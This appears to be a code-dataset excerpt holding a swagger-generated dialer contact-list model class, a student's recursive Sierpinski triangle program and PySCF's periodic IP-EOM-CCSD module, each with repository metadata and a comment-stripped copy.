        Gets the callable_time_column of this DialerContactlistConfigChangeContactPhoneNumberColumn.

        :return: The callable_time_column of this DialerContactlistConfigChangeContactPhoneNumberColumn.
        :rtype: str
        """
        return self._callable_time_column

    @callable_time_column.setter
    def callable_time_column(self, callable_time_column):
        """
        Sets the callable_time_column of this DialerContactlistConfigChangeContactPhoneNumberColumn.

        :param callable_time_column: The callable_time_column of this DialerContactlistConfigChangeContactPhoneNumberColumn.
        :type: str
        """
        self._callable_time_column = callable_time_column

    @property
    def additional_properties(self):
        """
        Gets the additional_properties of this DialerContactlistConfigChangeContactPhoneNumberColumn.

        :return: The additional_properties of this DialerContactlistConfigChangeContactPhoneNumberColumn.
        :rtype: object
        """
        return self._additional_properties

    @additional_properties.setter
    def additional_properties(self, additional_properties):
        """
        Sets the additional_properties of this DialerContactlistConfigChangeContactPhoneNumberColumn.

        :param additional_properties: The additional_properties of this DialerContactlistConfigChangeContactPhoneNumberColumn.
        :type: object
        """
        self._additional_properties = additional_properties

    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}

        for attr, _ in iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_json(self):
        """
        Returns the model as raw JSON
        """
        return json.dumps(sanitize_for_serialization(self.to_dict()))

    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
| 30.244019
| 126
| 0.63376
|
from pprint import pformat
from six import iteritems
import re
import json
from ..utils import sanitize_for_serialization
class DialerContactlistConfigChangeContactPhoneNumberColumn(object):
def __init__(self):
self.swagger_types = {
'column_name': 'str',
'type': 'str',
'callable_time_column': 'str',
'additional_properties': 'object'
}
self.attribute_map = {
'column_name': 'columnName',
'type': 'type',
'callable_time_column': 'callableTimeColumn',
'additional_properties': 'additionalProperties'
}
self._column_name = None
self._type = None
self._callable_time_column = None
self._additional_properties = None
@property
def column_name(self):
return self._column_name
@column_name.setter
def column_name(self, column_name):
self._column_name = column_name
@property
def type(self):
return self._type
@type.setter
def type(self, type):
self._type = type
@property
def callable_time_column(self):
return self._callable_time_column
@callable_time_column.setter
def callable_time_column(self, callable_time_column):
self._callable_time_column = callable_time_column
@property
def additional_properties(self):
return self._additional_properties
@additional_properties.setter
def additional_properties(self, additional_properties):
self._additional_properties = additional_properties
def to_dict(self):
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_json(self):
return json.dumps(sanitize_for_serialization(self.to_dict()))
def to_str(self):
return pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true
| true
|
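The generated model above follows the standard swagger-codegen shape: swagger_types drives to_dict, and attribute_map records the JSON key for each Python attribute. A minimal self-contained sketch of that serialization pattern (the Column class and its fields here are illustrative stand-ins, not part of the generated SDK):

import json

class Column(object):
    # Minimal stand-in for a swagger-codegen model (illustrative only).
    def __init__(self):
        self.swagger_types = {'column_name': 'str', 'type': 'str'}
        self.attribute_map = {'column_name': 'columnName', 'type': 'type'}
        self.column_name = None
        self.type = None

    def to_dict(self):
        # Walk swagger_types and recurse into nested models, exactly as the
        # generated to_dict above does (list/dict handling omitted for brevity).
        result = {}
        for attr in self.swagger_types:
            value = getattr(self, attr)
            result[attr] = value.to_dict() if hasattr(value, 'to_dict') else value
        return result

col = Column()
col.column_name = 'phone'
col.type = 'TEXT'
print(json.dumps(col.to_dict()))  # {"column_name": "phone", "type": "TEXT"}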
1c445c41e477e8613eedb82276ff8ae651e83f36
| 2,123
|
py
|
Python
|
stanCode_projects/boggle game solver/sierpinski.py
|
KevinCheng713/stanCode_project
|
0b2ba48be20c1737426d40eb941e8640b15acfe8
|
[
"MIT"
] | null | null | null |
stanCode_projects/boggle game solver/sierpinski.py
|
KevinCheng713/stanCode_project
|
0b2ba48be20c1737426d40eb941e8640b15acfe8
|
[
"MIT"
] | null | null | null |
stanCode_projects/boggle game solver/sierpinski.py
|
KevinCheng713/stanCode_project
|
0b2ba48be20c1737426d40eb941e8640b15acfe8
|
[
"MIT"
] | null | null | null |
"""
File: sierpinski.py
Name: 鄭凱元
---------------------------
This file recursively prints the Sierpinski triangle on GWindow.
The Sierpinski triangle is a fractal described in 1915 by Waclaw Sierpinski.
It is a self-similar structure that recurs at different levels of iteration.
"""
from campy.graphics.gwindow import GWindow
from campy.graphics.gobjects import GLine
from campy.gui.events.timer import pause
# Constants
ORDER = 6 # Controls the order of Sierpinski Triangle
LENGTH = 600 # The length of order 1 Sierpinski Triangle
UPPER_LEFT_X = 150 # The upper left x coordinate of order 1 Sierpinski Triangle
UPPER_LEFT_Y = 100 # The upper left y coordinate of order 1 Sierpinski Triangle
WINDOW_WIDTH = 950 # The width of the GWindow
WINDOW_HEIGHT = 700 # The height of the GWindow
# Global Variable
window = GWindow(width=WINDOW_WIDTH, height=WINDOW_HEIGHT) # The canvas to draw Sierpinski Triangle
def main():
"""
    Draws the recursive Sierpinski triangle.
"""
sierpinski_triangle(ORDER, LENGTH, UPPER_LEFT_X, UPPER_LEFT_Y)
def sierpinski_triangle(order, length, upper_left_x, upper_left_y):
"""
    :param order: Determines how many levels of smaller triangles are nested within the larger triangle
    :param length: The side length of the equilateral triangle
    :param upper_left_x: The x coordinate of the triangle's upper-left corner
    :param upper_left_y: The y coordinate of the triangle's upper-left corner
    :return: None
"""
if order == 0:
pass
else:
line1 = GLine(upper_left_x, upper_left_y, upper_left_x + length, upper_left_y)
line2 = GLine(upper_left_x, upper_left_y, upper_left_x+length*0.5, upper_left_y+length*0.866)
line3 = GLine(upper_left_x+length*0.5, upper_left_y+length*0.866, upper_left_x + length, upper_left_y)
window.add(line1)
window.add(line2)
window.add(line3)
sierpinski_triangle(order-1, length*0.5, upper_left_x, upper_left_y)
sierpinski_triangle(order-1, length*0.5, upper_left_x+length/2, upper_left_y)
sierpinski_triangle(order-1, length*0.5, upper_left_x+length*0.5/2, upper_left_y+length*0.866/2)
if __name__ == '__main__':
main()
| 37.245614
| 104
| 0.747527
|
from campy.graphics.gwindow import GWindow
from campy.graphics.gobjects import GLine
from campy.gui.events.timer import pause
ORDER = 6
LENGTH = 600
UPPER_LEFT_X = 150
UPPER_LEFT_Y = 100
WINDOW_WIDTH = 950
WINDOW_HEIGHT = 700
window = GWindow(width=WINDOW_WIDTH, height=WINDOW_HEIGHT)
def main():
sierpinski_triangle(ORDER, LENGTH, UPPER_LEFT_X, UPPER_LEFT_Y)
def sierpinski_triangle(order, length, upper_left_x, upper_left_y):
if order == 0:
pass
else:
line1 = GLine(upper_left_x, upper_left_y, upper_left_x + length, upper_left_y)
line2 = GLine(upper_left_x, upper_left_y, upper_left_x+length*0.5, upper_left_y+length*0.866)
line3 = GLine(upper_left_x+length*0.5, upper_left_y+length*0.866, upper_left_x + length, upper_left_y)
window.add(line1)
window.add(line2)
window.add(line3)
sierpinski_triangle(order-1, length*0.5, upper_left_x, upper_left_y)
sierpinski_triangle(order-1, length*0.5, upper_left_x+length/2, upper_left_y)
sierpinski_triangle(order-1, length*0.5, upper_left_x+length*0.5/2, upper_left_y+length*0.866/2)
if __name__ == '__main__':
main()
| true
| true
|
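A quick sanity check on the recursion above: every call with order > 0 draws 3 GLines and spawns 3 half-size copies, so the line count obeys L(n) = 3 + 3*L(n-1), i.e. 3*(3**n - 1)/2 in closed form. A dependency-free sketch that mirrors only the counting (campy and the actual drawing are not needed):

def line_count(order):
    # Mirrors sierpinski_triangle: 3 GLines per call, 3 recursive calls.
    if order == 0:
        return 0
    return 3 + 3 * line_count(order - 1)

assert line_count(6) == 3 * (3 ** 6 - 1) // 2 == 1092
print(line_count(6))  # 1092 GLine objects for ORDER = 6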
1c445c8ccc4933db31ddfcff4f2af668f7348e6b
| 12,255
|
py
|
Python
|
pyscf/pbc/cc/eom_kccsd_rhf_ip.py
|
crisely09/pyscf
|
cb92f7974bd9c87c0ef5b2b52abf5d3219b3d6b6
|
[
"Apache-2.0"
] | 2
|
2019-05-28T05:25:56.000Z
|
2019-11-09T02:16:43.000Z
|
pyscf/pbc/cc/eom_kccsd_rhf_ip.py
|
crisely09/pyscf
|
cb92f7974bd9c87c0ef5b2b52abf5d3219b3d6b6
|
[
"Apache-2.0"
] | 2
|
2019-09-16T17:58:31.000Z
|
2019-09-22T17:26:01.000Z
|
pyscf/pbc/cc/eom_kccsd_rhf_ip.py
|
crisely09/pyscf
|
cb92f7974bd9c87c0ef5b2b52abf5d3219b3d6b6
|
[
"Apache-2.0"
] | 1
|
2019-11-09T02:13:16.000Z
|
2019-11-09T02:13:16.000Z
|
#!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors: Artem Pulkin, pyscf authors
from pyscf.lib import logger, linalg_helper, einsum
from pyscf.lib.parameters import LARGE_DENOM
from pyscf.pbc.lib.kpts_helper import VectorSplitter, VectorComposer
from pyscf.pbc.mp.kmp2 import padding_k_idx
import numpy as np
import time
def iter_12(cc, k):
"""Iterates over IP index slices."""
o, v = padding_k_idx(cc, kind="split")
kconserv = cc.khelper.kconserv
yield (o[k],)
for ki in range(cc.nkpts):
for kj in range(cc.nkpts):
kb = kconserv[ki, k, kj]
yield (ki,), (kj,), o[ki], o[kj], v[kb]
def amplitudes_to_vector(cc, t1, t2, k):
"""IP amplitudes to vector."""
itr = iter_12(cc, k)
t1, t2 = np.asarray(t1), np.asarray(t2)
vc = VectorComposer(t1.dtype)
vc.put(t1[np.ix_(*next(itr))])
for slc in itr:
vc.put(t2[np.ix_(*slc)])
return vc.flush()
def vector_to_amplitudes(cc, vec, k):
"""IP vector to apmplitudes."""
expected_vs = vector_size(cc, k)
if expected_vs != len(vec):
raise ValueError("The size of the vector passed {:d} should be exactly {:d}".format(len(vec), expected_vs))
itr = iter_12(cc, k)
vs = VectorSplitter(vec)
r1 = vs.get(cc.nocc, slc=next(itr))
r2 = np.zeros((cc.nkpts, cc.nkpts, cc.nocc, cc.nocc, cc.nmo - cc.nocc), vec.dtype)
for slc in itr:
vs.get(r2, slc=slc)
return r1, r2
def vector_size(cc, k):
"""The total number of elements in IP vector."""
size = 0
for slc in iter_12(cc, k):
size += np.prod(tuple(len(i) for i in slc))
return size
def kernel(cc, nroots=1, koopmans=False, guess=None, partition=None,
kptlist=None):
'''Calculate (N-1)-electron charged excitations via IP-EOM-CCSD.
Kwargs:
nroots : int
Number of roots (eigenvalues) requested per k-point
koopmans : bool
Calculate Koopmans'-like (quasiparticle) excitations only, targeting via
overlap.
guess : list of ndarray
List of guess vectors to use for targeting via overlap.
        partition : str or None
Use a matrix-partitioning for the doubles-doubles block.
Can be None, 'mp' (Moller-Plesset, i.e. orbital energies on the diagonal),
or 'full' (full diagonal elements).
kptlist : list
List of k-point indices for which eigenvalues are requested.
'''
    cput0 = (time.process_time(), time.time())
log = logger.Logger(cc.stdout, cc.verbose)
nocc = cc.nocc
nvir = cc.nmo - nocc
nkpts = cc.nkpts
if kptlist is None:
kptlist = range(nkpts)
for k, kshift in enumerate(kptlist):
size = vector_size(cc, kshift)
nfrozen = np.sum(mask_frozen(cc, np.zeros(size, dtype=int), kshift, const=1))
nroots = min(nroots, size - nfrozen)
if partition:
partition = partition.lower()
assert partition in ['mp', 'full']
cc.ip_partition = partition
    evals = np.zeros((len(kptlist), nroots), np.float64)
evecs = []
for k, kshift in enumerate(kptlist):
adiag = diag(cc, kshift)
adiag = mask_frozen(cc, adiag, kshift, const=LARGE_DENOM)
size = vector_size(cc, kshift)
if partition == 'full':
cc._ipccsd_diag_matrix2 = vector_to_amplitudes(cc, adiag, kshift)[1]
if guess is not None:
guess_k = guess[k]
# assert len(guess_k) == nroots
for g in guess_k:
assert g.size == size
else:
guess_k = []
if koopmans:
for n in range(nroots):
g = np.zeros(size)
nocc = cc.get_nocc(True)[kshift]
g[nocc-n-1] = 1.0
g = mask_frozen(cc, g, kshift, const=0.0)
guess_k.append(g)
else:
idx = adiag.argsort()[:nroots]
for i in idx:
g = np.zeros(size)
g[i] = 1.0
g = mask_frozen(cc, g, kshift, const=0.0)
guess_k.append(g)
def precond(r, e0, x0):
return r / (e0 - adiag + 1e-12)
eig = linalg_helper.eig
if guess is not None or koopmans:
def pickeig(w, v, nroots, envs):
x0 = linalg_helper._gen_x0(envs['v'], envs['xs'])
s = np.dot(np.asarray(guess_k).conj(), np.asarray(x0).T)
snorm = np.einsum('pi,pi->i', s.conj(), s)
idx = np.argsort(-snorm)[:nroots]
return linalg_helper._eigs_cmplx2real(w, v, idx, real_eigenvectors=False)
evals_k, evecs_k = eig(lambda _arg: matvec(cc, _arg, kshift), guess_k, precond, pick=pickeig,
tol=cc.conv_tol, max_cycle=cc.max_cycle,
max_space=cc.max_space, nroots=len(guess_k), verbose=cc.verbose)
else:
evals_k, evecs_k = eig(lambda _arg: matvec(cc, _arg, kshift), guess_k, precond,
tol=cc.conv_tol, max_cycle=cc.max_cycle,
max_space=cc.max_space, nroots=len(guess_k), verbose=cc.verbose)
if nroots == 1:
evals_k, evecs_k = np.array([evals_k]), np.array([evecs_k])
evals_k = evals_k.real
evals[k] = evals_k
evecs.append(evecs_k)
for n, en, vn in zip(range(nroots), evals_k, evecs_k):
r1, r2 = vector_to_amplitudes(cc, vn, kshift)
qp_weight = np.linalg.norm(r1) ** 2
logger.info(cc, 'EOM root %d E = %.16g qpwt = %0.6g',
n, en, qp_weight)
log.timer('EOM-CCSD', *cput0)
cc.eip = evals
return cc.eip, evecs
def matvec(cc, vector, k):
'''2ph operators are of the form s_{ij}^{ b}, i.e. 'jb' indices are coupled.'''
# Ref: Nooijen and Snijders, J. Chem. Phys. 102, 1681 (1995) Eqs.(8)-(9)
if not cc.imds.made_ip_imds:
cc.imds.make_ip(cc.ip_partition)
imds = cc.imds
vector = mask_frozen(cc, vector, k, const=0.0)
r1, r2 = vector_to_amplitudes(cc, vector, k)
t1, t2 = cc.t1, cc.t2
nkpts = cc.nkpts
kconserv = cc.khelper.kconserv
# 1h-1h block
Hr1 = -einsum('ki,k->i', imds.Loo[k], r1)
# 1h-2h1p block
for kl in range(nkpts):
Hr1 += 2. * einsum('ld,ild->i', imds.Fov[kl], r2[k, kl])
Hr1 += -einsum('ld,lid->i', imds.Fov[kl], r2[kl, k])
for kk in range(nkpts):
kd = kconserv[kk, k, kl]
Hr1 += -2. * einsum('klid,kld->i', imds.Wooov[kk, kl, k], r2[kk, kl])
Hr1 += einsum('lkid,kld->i', imds.Wooov[kl, kk, k], r2[kk, kl])
Hr2 = np.zeros(r2.shape, dtype=np.common_type(imds.Wovoo[0, 0, 0], r1))
# 2h1p-1h block
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] -= einsum('kbij,k->ijb', imds.Wovoo[k, kb, ki], r1)
# 2h1p-2h1p block
if cc.ip_partition == 'mp':
nkpts, nocc, nvir = cc.t1.shape
fock = cc.eris.fock
foo = fock[:, :nocc, :nocc]
fvv = fock[:, nocc:, nocc:]
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] += einsum('bd,ijd->ijb', fvv[kb], r2[ki, kj])
Hr2[ki, kj] -= einsum('li,ljb->ijb', foo[ki], r2[ki, kj])
Hr2[ki, kj] -= einsum('lj,ilb->ijb', foo[kj], r2[ki, kj])
elif cc.ip_partition == 'full':
Hr2 += cc._ipccsd_diag_matrix2 * r2
else:
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] += einsum('bd,ijd->ijb', imds.Lvv[kb], r2[ki, kj])
Hr2[ki, kj] -= einsum('li,ljb->ijb', imds.Loo[ki], r2[ki, kj])
Hr2[ki, kj] -= einsum('lj,ilb->ijb', imds.Loo[kj], r2[ki, kj])
for kl in range(nkpts):
kk = kconserv[ki, kl, kj]
Hr2[ki, kj] += einsum('klij,klb->ijb', imds.Woooo[kk, kl, ki], r2[kk, kl])
kd = kconserv[kl, kj, kb]
Hr2[ki, kj] += 2. * einsum('lbdj,ild->ijb', imds.Wovvo[kl, kb, kd], r2[ki, kl])
Hr2[ki, kj] += -einsum('lbdj,lid->ijb', imds.Wovvo[kl, kb, kd], r2[kl, ki])
Hr2[ki, kj] += -einsum('lbjd,ild->ijb', imds.Wovov[kl, kb, kj], r2[ki, kl]) # typo in Ref
kd = kconserv[kl, ki, kb]
Hr2[ki, kj] += -einsum('lbid,ljd->ijb', imds.Wovov[kl, kb, ki], r2[kl, kj])
tmp = (2. * einsum('xyklcd,xykld->c', imds.Woovv[:, :, k], r2[:, :])
- einsum('yxlkcd,xykld->c', imds.Woovv[:, :, k], r2[:, :]))
Hr2[:, :] += -einsum('c,xyijcb->xyijb', tmp, t2[:, :, k])
return mask_frozen(cc, amplitudes_to_vector(cc, Hr1, Hr2, k), k, const=0.0)
def diag(cc, k):
"""Diagonal for the IP vector update."""
if not cc.imds.made_ip_imds:
cc.imds.make_ip(cc.ip_partition)
imds = cc.imds
t1, t2 = cc.t1, cc.t2
nkpts, nocc, nvir = t1.shape
kconserv = cc.khelper.kconserv
Hr1 = -np.diag(imds.Loo[k])
Hr2 = np.zeros((nkpts, nkpts, nocc, nocc, nvir), dtype=t1.dtype)
if cc.ip_partition == 'mp':
foo = cc.eris.fock[:, :nocc, :nocc]
fvv = cc.eris.fock[:, nocc:, nocc:]
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] = fvv[kb].diagonal()
Hr2[ki, kj] -= foo[ki].diagonal()[:, None, None]
Hr2[ki, kj] -= foo[kj].diagonal()[:, None]
else:
idx = np.arange(nocc)
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] = imds.Lvv[kb].diagonal()
Hr2[ki, kj] -= imds.Loo[ki].diagonal()[:, None, None]
Hr2[ki, kj] -= imds.Loo[kj].diagonal()[:, None]
if ki == kconserv[ki, kj, kj]:
Hr2[ki, kj] += np.einsum('ijij->ij', imds.Woooo[ki, kj, ki])[:, :, None]
Hr2[ki, kj] -= np.einsum('jbjb->jb', imds.Wovov[kj, kb, kj])
Wovvo = np.einsum('jbbj->jb', imds.Wovvo[kj, kb, kb])
Hr2[ki, kj] += 2. * Wovvo
if ki == kj: # and i == j
Hr2[ki, ki, idx, idx] -= Wovvo
Hr2[ki, kj] -= np.einsum('ibib->ib', imds.Wovov[ki, kb, ki])[:, None, :]
kd = kconserv[kj, k, ki]
Hr2[ki, kj] -= 2. * np.einsum('ijcb,jibc->ijb', t2[ki, kj, k], imds.Woovv[kj, ki, kd])
Hr2[ki, kj] += np.einsum('ijcb,ijbc->ijb', t2[ki, kj, k], imds.Woovv[ki, kj, kd])
return amplitudes_to_vector(cc, Hr1, Hr2, k)
def mask_frozen(cc, vector, k, const=LARGE_DENOM):
'''Replaces all frozen orbital indices of `vector` with the value `const`.'''
r1, r2 = vector_to_amplitudes(cc, vector, k)
nkpts, nocc, nvir = cc.t1.shape
kconserv = cc.khelper.kconserv
# Get location of padded elements in occupied and virtual space
nonzero_opadding, nonzero_vpadding = padding_k_idx(cc, kind="split")
new_r1 = const * np.ones_like(r1)
new_r2 = const * np.ones_like(r2)
new_r1[nonzero_opadding[k]] = r1[nonzero_opadding[k]]
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
idx = np.ix_([ki], [kj], nonzero_opadding[ki], nonzero_opadding[kj], nonzero_vpadding[kb])
new_r2[idx] = r2[idx]
return amplitudes_to_vector(cc, new_r1, new_r2, k)
| 38.416928
| 115
| 0.548919
|
from pyscf.lib import logger, linalg_helper, einsum
from pyscf.lib.parameters import LARGE_DENOM
from pyscf.pbc.lib.kpts_helper import VectorSplitter, VectorComposer
from pyscf.pbc.mp.kmp2 import padding_k_idx
import numpy as np
import time
def iter_12(cc, k):
o, v = padding_k_idx(cc, kind="split")
kconserv = cc.khelper.kconserv
yield (o[k],)
for ki in range(cc.nkpts):
for kj in range(cc.nkpts):
kb = kconserv[ki, k, kj]
yield (ki,), (kj,), o[ki], o[kj], v[kb]
def amplitudes_to_vector(cc, t1, t2, k):
itr = iter_12(cc, k)
t1, t2 = np.asarray(t1), np.asarray(t2)
vc = VectorComposer(t1.dtype)
vc.put(t1[np.ix_(*next(itr))])
for slc in itr:
vc.put(t2[np.ix_(*slc)])
return vc.flush()
def vector_to_amplitudes(cc, vec, k):
expected_vs = vector_size(cc, k)
if expected_vs != len(vec):
raise ValueError("The size of the vector passed {:d} should be exactly {:d}".format(len(vec), expected_vs))
itr = iter_12(cc, k)
vs = VectorSplitter(vec)
r1 = vs.get(cc.nocc, slc=next(itr))
r2 = np.zeros((cc.nkpts, cc.nkpts, cc.nocc, cc.nocc, cc.nmo - cc.nocc), vec.dtype)
for slc in itr:
vs.get(r2, slc=slc)
return r1, r2
def vector_size(cc, k):
size = 0
for slc in iter_12(cc, k):
size += np.prod(tuple(len(i) for i in slc))
return size
def kernel(cc, nroots=1, koopmans=False, guess=None, partition=None,
kptlist=None):
    cput0 = (time.process_time(), time.time())
log = logger.Logger(cc.stdout, cc.verbose)
nocc = cc.nocc
nvir = cc.nmo - nocc
nkpts = cc.nkpts
if kptlist is None:
kptlist = range(nkpts)
for k, kshift in enumerate(kptlist):
size = vector_size(cc, kshift)
nfrozen = np.sum(mask_frozen(cc, np.zeros(size, dtype=int), kshift, const=1))
nroots = min(nroots, size - nfrozen)
if partition:
partition = partition.lower()
assert partition in ['mp', 'full']
cc.ip_partition = partition
    evals = np.zeros((len(kptlist), nroots), np.float64)
evecs = []
for k, kshift in enumerate(kptlist):
adiag = diag(cc, kshift)
adiag = mask_frozen(cc, adiag, kshift, const=LARGE_DENOM)
size = vector_size(cc, kshift)
if partition == 'full':
cc._ipccsd_diag_matrix2 = vector_to_amplitudes(cc, adiag, kshift)[1]
if guess is not None:
guess_k = guess[k]
for g in guess_k:
assert g.size == size
else:
guess_k = []
if koopmans:
for n in range(nroots):
g = np.zeros(size)
nocc = cc.get_nocc(True)[kshift]
g[nocc-n-1] = 1.0
g = mask_frozen(cc, g, kshift, const=0.0)
guess_k.append(g)
else:
idx = adiag.argsort()[:nroots]
for i in idx:
g = np.zeros(size)
g[i] = 1.0
g = mask_frozen(cc, g, kshift, const=0.0)
guess_k.append(g)
def precond(r, e0, x0):
return r / (e0 - adiag + 1e-12)
eig = linalg_helper.eig
if guess is not None or koopmans:
def pickeig(w, v, nroots, envs):
x0 = linalg_helper._gen_x0(envs['v'], envs['xs'])
s = np.dot(np.asarray(guess_k).conj(), np.asarray(x0).T)
snorm = np.einsum('pi,pi->i', s.conj(), s)
idx = np.argsort(-snorm)[:nroots]
return linalg_helper._eigs_cmplx2real(w, v, idx, real_eigenvectors=False)
evals_k, evecs_k = eig(lambda _arg: matvec(cc, _arg, kshift), guess_k, precond, pick=pickeig,
tol=cc.conv_tol, max_cycle=cc.max_cycle,
max_space=cc.max_space, nroots=len(guess_k), verbose=cc.verbose)
else:
evals_k, evecs_k = eig(lambda _arg: matvec(cc, _arg, kshift), guess_k, precond,
tol=cc.conv_tol, max_cycle=cc.max_cycle,
max_space=cc.max_space, nroots=len(guess_k), verbose=cc.verbose)
if nroots == 1:
evals_k, evecs_k = np.array([evals_k]), np.array([evecs_k])
evals_k = evals_k.real
evals[k] = evals_k
evecs.append(evecs_k)
for n, en, vn in zip(range(nroots), evals_k, evecs_k):
r1, r2 = vector_to_amplitudes(cc, vn, kshift)
qp_weight = np.linalg.norm(r1) ** 2
logger.info(cc, 'EOM root %d E = %.16g qpwt = %0.6g',
n, en, qp_weight)
log.timer('EOM-CCSD', *cput0)
cc.eip = evals
return cc.eip, evecs
def matvec(cc, vector, k):
if not cc.imds.made_ip_imds:
cc.imds.make_ip(cc.ip_partition)
imds = cc.imds
vector = mask_frozen(cc, vector, k, const=0.0)
r1, r2 = vector_to_amplitudes(cc, vector, k)
t1, t2 = cc.t1, cc.t2
nkpts = cc.nkpts
kconserv = cc.khelper.kconserv
Hr1 = -einsum('ki,k->i', imds.Loo[k], r1)
for kl in range(nkpts):
Hr1 += 2. * einsum('ld,ild->i', imds.Fov[kl], r2[k, kl])
Hr1 += -einsum('ld,lid->i', imds.Fov[kl], r2[kl, k])
for kk in range(nkpts):
kd = kconserv[kk, k, kl]
Hr1 += -2. * einsum('klid,kld->i', imds.Wooov[kk, kl, k], r2[kk, kl])
Hr1 += einsum('lkid,kld->i', imds.Wooov[kl, kk, k], r2[kk, kl])
Hr2 = np.zeros(r2.shape, dtype=np.common_type(imds.Wovoo[0, 0, 0], r1))
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] -= einsum('kbij,k->ijb', imds.Wovoo[k, kb, ki], r1)
if cc.ip_partition == 'mp':
nkpts, nocc, nvir = cc.t1.shape
fock = cc.eris.fock
foo = fock[:, :nocc, :nocc]
fvv = fock[:, nocc:, nocc:]
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] += einsum('bd,ijd->ijb', fvv[kb], r2[ki, kj])
Hr2[ki, kj] -= einsum('li,ljb->ijb', foo[ki], r2[ki, kj])
Hr2[ki, kj] -= einsum('lj,ilb->ijb', foo[kj], r2[ki, kj])
elif cc.ip_partition == 'full':
Hr2 += cc._ipccsd_diag_matrix2 * r2
else:
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] += einsum('bd,ijd->ijb', imds.Lvv[kb], r2[ki, kj])
Hr2[ki, kj] -= einsum('li,ljb->ijb', imds.Loo[ki], r2[ki, kj])
Hr2[ki, kj] -= einsum('lj,ilb->ijb', imds.Loo[kj], r2[ki, kj])
for kl in range(nkpts):
kk = kconserv[ki, kl, kj]
Hr2[ki, kj] += einsum('klij,klb->ijb', imds.Woooo[kk, kl, ki], r2[kk, kl])
kd = kconserv[kl, kj, kb]
Hr2[ki, kj] += 2. * einsum('lbdj,ild->ijb', imds.Wovvo[kl, kb, kd], r2[ki, kl])
Hr2[ki, kj] += -einsum('lbdj,lid->ijb', imds.Wovvo[kl, kb, kd], r2[kl, ki])
Hr2[ki, kj] += -einsum('lbjd,ild->ijb', imds.Wovov[kl, kb, kj], r2[ki, kl])
kd = kconserv[kl, ki, kb]
Hr2[ki, kj] += -einsum('lbid,ljd->ijb', imds.Wovov[kl, kb, ki], r2[kl, kj])
tmp = (2. * einsum('xyklcd,xykld->c', imds.Woovv[:, :, k], r2[:, :])
- einsum('yxlkcd,xykld->c', imds.Woovv[:, :, k], r2[:, :]))
Hr2[:, :] += -einsum('c,xyijcb->xyijb', tmp, t2[:, :, k])
return mask_frozen(cc, amplitudes_to_vector(cc, Hr1, Hr2, k), k, const=0.0)
def diag(cc, k):
if not cc.imds.made_ip_imds:
cc.imds.make_ip(cc.ip_partition)
imds = cc.imds
t1, t2 = cc.t1, cc.t2
nkpts, nocc, nvir = t1.shape
kconserv = cc.khelper.kconserv
Hr1 = -np.diag(imds.Loo[k])
Hr2 = np.zeros((nkpts, nkpts, nocc, nocc, nvir), dtype=t1.dtype)
if cc.ip_partition == 'mp':
foo = cc.eris.fock[:, :nocc, :nocc]
fvv = cc.eris.fock[:, nocc:, nocc:]
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] = fvv[kb].diagonal()
Hr2[ki, kj] -= foo[ki].diagonal()[:, None, None]
Hr2[ki, kj] -= foo[kj].diagonal()[:, None]
else:
idx = np.arange(nocc)
for ki in range(nkpts):
for kj in range(nkpts):
kb = kconserv[ki, k, kj]
Hr2[ki, kj] = imds.Lvv[kb].diagonal()
Hr2[ki, kj] -= imds.Loo[ki].diagonal()[:, None, None]
Hr2[ki, kj] -= imds.Loo[kj].diagonal()[:, None]
if ki == kconserv[ki, kj, kj]:
Hr2[ki, kj] += np.einsum('ijij->ij', imds.Woooo[ki, kj, ki])[:, :, None]
Hr2[ki, kj] -= np.einsum('jbjb->jb', imds.Wovov[kj, kb, kj])
Wovvo = np.einsum('jbbj->jb', imds.Wovvo[kj, kb, kb])
Hr2[ki, kj] += 2. * Wovvo
if ki == kj:
Hr2[ki, ki, idx, idx] -= Wovvo
Hr2[ki, kj] -= np.einsum('ibib->ib', imds.Wovov[ki, kb, ki])[:, None, :]
kd = kconserv[kj, k, ki]
